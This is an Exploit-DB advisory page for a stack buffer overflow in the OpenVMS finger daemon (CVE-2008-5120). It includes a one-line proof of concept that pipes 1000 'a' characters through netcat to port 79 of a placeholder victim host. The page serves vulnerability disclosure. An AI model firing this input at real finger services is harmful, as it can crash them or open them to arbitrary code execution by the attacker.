| EDB-ID: 32193 | Author: Shaun Colley | Published: 2008-08-07 | |
| CVE: CVE-2008-5120 | Type: Dos | Platform: Multiple | |
| Aliases: N/A | Advisory/Source: Link | Tags: Vulnerability | |
E-DB Verified:
 |
Exploit:
 Download
/
View Raw
|
Vulnerable App: N/A | |
source: http://www.securityfocus.com/bid/30589/info
The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.
We were not told which versions are affected. We will update this BID as more information emerges.
echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79
Related Exploits
Trying to match CVEs (1): CVE-2008-5120Trying to match OSVDBs (1): 49922
Other Possible E-DB Search Terms: OpenVms 8.3 Finger Service, OpenVms
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2002-09-25 | |
|
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | Mike Riley |